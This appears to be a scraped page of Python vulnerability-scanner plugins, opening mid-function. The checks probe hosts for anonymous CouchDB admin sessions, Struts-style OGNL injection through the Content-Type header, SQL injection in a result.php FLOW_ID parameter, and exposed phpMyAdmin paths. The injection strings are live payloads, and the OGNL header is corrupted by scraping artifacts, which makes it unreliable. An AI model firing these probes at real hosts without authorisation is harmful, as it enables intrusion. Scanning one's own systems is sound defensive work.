
    except:
        return False
Esempio n. 27
0
def check(host, port=5984):
    """Report a CouchDB-style ``/_session`` that shows the anonymous caller as ``_admin``.

    A 200 whose body contains ``"roles":["_admin"]}`` is a hit; the parsed
    JSON session document becomes ``output`` (a non-JSON body raises and is
    reported as ``False``).

    Returns ``(True, host, url, session_json)`` on a hit, otherwise ``False``
    (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    paths = ['/_session']
    markers = ['"roles":["_admin"]}']

    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for path in paths:
                url = '{}{}'.format(base, path)
                response = session.get(url, timeout=7, verify=False)
                body = response.text
                matched = any(marker in body for marker in markers)
                if matched and response.status_code == 200:
                    output = response.json()
                    # NOTE(review): an empty string is persisted here while
                    # the session document is returned to the caller; the
                    # sibling checks persist `output` - confirm which is
                    # intended.
                    insert_vuln_db(host, url, "", plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 28
0
def check(host, port=80):
    """Expression-injection probe through the ``Content-Type`` request header.

    A single GET to the base URL carries an OGNL-style expression in
    ``Content-Type`` that, if evaluated, writes ``'biu'+'framework'`` into the
    response; ``biuframework`` in the body is therefore the hit and the whole
    body is stored. Note the scraped header value contains a
    ``[email protected]``-looking fragment, which looks like an artifact of
    the source page rather than the original expression - verify before use.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception). Uses a 10 s timeout.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    hits = ['biuframework']
    try:
        targets = [target]
        headers = {"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('biu'+'framework')).(#o.close())}"}
        # disable_warnings() is commented out here, so verify=False below
        # emits an InsecureRequestWarning on every call.
        #requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=10, verify=False, headers=headers)
                for hit in hits:
                    if hit in response.text:
                        output = response.text

                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 29
0
def check(host, port=80):
    """Error-based SQL injection probe on ``result.php`` via ``FLOW_ID``.

    The ``FLOW_ID`` value ends in ``%bf%27`` (a multibyte-prefixed quote);
    a body containing the Chinese error-page string ``SQL语句`` ("SQL
    statement") is the hit and the whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20']
    hits = ['SQL语句']

    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=7, verify=False)
                for hit in hits:
                    if hit in response.text:
                        # The stored evidence is the full error page, which
                        # may echo the failing query text.
                        output = response.text
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 30
0
def check(host, port=80):
    """Look for a phpMyAdmin instance under common administrative paths.

    Each path is fetched with GET; a body containing either of the
    ``PMA_commonParams`` / ``PMA_sendHeaderLocation`` JavaScript markers is a
    hit regardless of status code, and the whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    paths = ['/phpmyadmin', '/database', '/pma', '/db', '/mysql', '/console']
    markers = ['PMA_commonParams', 'PMA_sendHeaderLocation']

    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for path in paths:
                url = '{}{}'.format(base, path)
                response = session.get(url, timeout=7, verify=False)
                body = response.text
                if not any(marker in body for marker in markers):
                    continue
                output = body
                insert_vuln_db(host, url, output, plugin_id)
                return True, host, url, output
    except Exception:
        return False
    return False